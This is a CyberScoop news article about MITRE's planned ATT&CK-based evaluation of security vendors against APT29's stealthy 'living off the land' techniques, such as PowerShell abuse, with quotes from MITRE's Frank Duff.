MITRE asks vendors to do more to detect stealthy hacks

APT29 is the muse, but the evaluation is also about ensuring that products can detect "living off the land" techniques.

As hackers continue to use native programming tools to blend into target networks, Mitre Corp. is beginning to test vendors’ ability to detect those techniques.

The federally-funded, not-for-profit organization announced Wednesday it would throw the stealthy tactics of an infamous hacking group, the Russian-government-linked APT29, at several threat-detection products.

But the evaluation is about more than one set of adversaries. The “living off the land” techniques, such as hiding in PowerShell scripts, that will be tested are increasingly popular with a variety of hacking groups.

“A lot of these techniques are going to be implemented in similar ways from different adversaries,” said Frank Duff, Mitre’s lead for evaluations that use the organization’s ATT&CK framework.


“PowerShell monitoring is that next thing that everyone recognizes is absolutely necessary,” he added.

Mitre’s last round of testing focused on advanced persistent threats, mimicking the tactics of APT3, a China-based group known for using internet-browser exploits. But the techniques of APT29, best known for being one of two Russian outfits to breach the Democratic National Committee before the 2016 U.S. election, will be a stiffer test, according to Duff.

“Because it’s a more sophisticated adversary, they do a lot more in terms of scripting, a lot more in terms of using built-in Windows [application programming interfaces],” he told CyberScoop. “Unless you have the right sensoring and the right ways of whittling ways through large amounts of noise, it’s going to be a harder thing for these vendors to succeed at.”

The first round of APT3 evaluations tested products made by vendors such as Carbon Black, CrowdStrike, Endgame, and Microsoft. Mitre is hoping for similarly-robust participation this go-round.

Duff said the APT29 test will incorporate a range of data from the group’s activity. After a relative lull in activity, APT29 appeared to rear its head last fall in a spearphishing campaign against U.S. military and defense contractors


Don’t expect the Mitre team to simulate tactics used by every APT group. Instead, evaluators are testing tactics employed by groups that offer valuable defensive lessons to the broader cybersecurity industry, according to Duff.

The inclusion of APT29 techniques in the testing, which will begin this summer, is meant to “really push the boundaries forward” for vendors, he said.

Sean Lyngaas

Written by Sean Lyngaas

Sean Lyngaas is CyberScoop’s Senior Reporter covering the Department of Homeland Security and Congress. He was previously a freelance journalist in West Africa, where he covered everything from a presidential election in Ghana to military mutinies in Ivory Coast for The New York Times. Lyngaas’ reporting also has appeared in The Washington Post, The Economist and the BBC, among other outlets. His investigation of cybersecurity issues in the nuclear sector, backed by a grant from the Pulitzer Center on Crisis Reporting, won plaudits from industrial security experts. He was previously a reporter with Federal Computer Week and, before that, with Smart Grid Today. Sean earned a B.A. in public policy from Duke University and an M.A. in International Relations from The Fletcher School of Law and Diplomacy at Tufts University.

Latest Podcasts